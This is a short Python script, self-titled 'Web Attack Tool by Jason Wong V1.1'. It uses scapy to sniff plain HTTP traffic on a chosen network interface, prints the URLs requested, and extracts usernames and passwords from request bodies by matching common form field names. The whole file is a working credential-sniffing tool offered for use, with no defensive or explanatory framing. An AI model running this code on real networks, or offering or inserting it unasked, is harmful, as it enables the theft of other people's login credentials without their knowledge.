from scapy.all import *
from scapy.layers import http
import sys
import re
import optparse
import termcolor
class HTTPIntercept:
def __init__(self,interface):
self.interface = interface
print("Start to listen on the interface: %s " % self.interface)
self.userlist = ['User', 'Username','username', 'user','USER'] # possible username fieldname
self.passwdlist = ['Password', 'password', 'pass', 'Pass', 'passwd', 'Passwd','PASS'] #possible password fieldname
def packet_handler(self,pkt):
try:
if pkt.haslayer(http.HTTPRequest):
url = pkt[http.HTTPRequest].Host + pkt[http.HTTPRequest].Path
print("Get requests to the website url: ", termcolor.colored(url.decode('utf-8'), 'blue'))
if pkt.haslayer(Raw):
load = pkt[Raw].load.decode('utf-8')
for user_info in self.userlist:
res = re.search(r'%s=(.*)&'%user_info, load)
if res:
print("Username Found: %s" % res.group(1))
break
for pass_info in self.passwdlist:
res = re.search(r'%s=(.*)&'%pass_info, load)
if res:
print("Password Found: %s" % res.group(1))
break
except:
pass
def run(self):
try:
sniff(iface=self.interface, store=False, prn=self.packet_handler)
except KeyboardInterrupt:
print("Exiting the program!")
sys.exit(0)
def get_params():
parser = optparse.OptionParser('Usage: -i interface')
parser.add_option('-i', '--interface', dest='interface', type='string', help='Specity interface to listen on ')
options, args = parser.parse_args()
if options.interface is None:
print(parser.usage)
sys.exit(0)
return options.interface
def banner():
banner = """
******************************************************************
******************************************************************
Web Attack Tool by Jason Wong V1.1
******************************************************************
******************************************************************
"""
print(banner)
if __name__ == "__main__":
banner()
interface = get_params()
http_intercept = HTTPIntercept(interface)
http_intercept.run()